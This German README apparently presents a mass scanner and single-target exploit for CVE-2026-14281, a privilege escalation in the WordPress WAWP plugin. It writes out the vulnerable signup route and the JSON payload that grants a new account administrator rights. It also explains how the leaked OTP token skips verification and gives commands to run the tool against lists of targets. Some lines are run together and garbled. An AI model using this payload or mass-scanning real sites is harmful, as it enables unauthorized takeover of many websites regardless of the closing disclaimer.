
Massenscanner und Single-Target-Exploit für CVE-2026-14281, eine unauthentifizierte Rechteausweitung im WordPress Automation Web Platform Plugin über REST-Signup.
Massenscanner + Single-Target-Exploit für CVE-2026-14281 — eine nicht authentifizierte Privilegienausweitung im WordPress-Plugin Automation Web Platform (WAWP)
<= 4.8.6.
Improper Privilege Management (CWE-269) im WordPress-Plugin Automation Web Platform (von 101gen). Betroffen sind Versionen <= 4.8.6.
| Feld | Wert |
|---|---|
| CVE | CVE-2026-14281 |
| Typ | Nicht authentifizierte Privilegienausweitung |
| CVSS | 9.8 (KRITISCH) |
| Auth | Keine erforderlich |
| Betroffen | WAWP-Plugin <= 4.8.6 |
Das Plugin stellt eine öffentliche REST-Route bereit:
POST /wp-json/wawp/v1/signup/<op>
Keine Berechtigungsprüfung. Der Handler kopiert vom Angreifer kontrollierte wawp_custom_fields in update_user_meta() — keine Allowlist. Der Angreifer setzt:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
Ergebnis: Das neue Konto erhält die Rolle Administrator.
Das OTP-Token (otp_transient) wird im Klartext im Response-Body zurückgegeben. Eine GET-Anfrage mit diesem Token markiert es als verifiziert — keine E-Mail/SMS erforderlich.
/wp-json/wawp/v1/signup/ mit wp_capabilities: administrator/wp-login.php mit den neuen Zugangsdaten/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: Eingabedatei mit Zielliste, Ausgabedatei (Standard vuln.txt), Thread-Anzahl (Standard 20).
Verify Single: YA eingeben, Ziel-URL angeben. Das Tool erstellt einen temporären Admin, verifiziert und räumt anschließend auf.
vuln.txt enthält nur bestätigte verwundbare URLs, eine pro Zeile:
http://target1.com
https://target2.org
4.8.6 hinaus/wp-json/wawp/v1/signup/ blockierenFor AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Nutze es mit Bedacht. Wissen soll schützen, nicht zerstören.